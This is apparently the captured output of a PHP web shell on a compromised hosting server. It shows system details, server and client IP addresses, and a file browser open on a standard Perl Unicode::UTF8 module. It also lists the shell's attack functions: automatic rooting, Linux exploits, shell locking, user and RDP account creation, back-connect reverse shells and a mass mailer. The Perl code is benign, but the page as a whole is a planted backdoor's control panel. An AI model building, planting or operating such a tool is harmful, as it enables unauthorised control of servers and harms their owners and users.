Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.71.255.142
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Unicode /
[ HOME SHELL ]
Name
Size
Permission
Action
UTF8.pm
346
B
-rw-r--r--
UTF8.pod
6.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UTF8.pm
package Unicode::UTF8; use strict; use warnings; BEGIN { our $VERSION = '0.62'; our @EXPORT_OK = qw[ decode_utf8 encode_utf8 valid_utf8 ]; our %EXPORT_TAGS = ( all => [ @EXPORT_OK ], ); require XSLoader; XSLoader::load(__PACKAGE__, $VERSION); require Exporter; *import = \&Exporter::import; } 1;
Close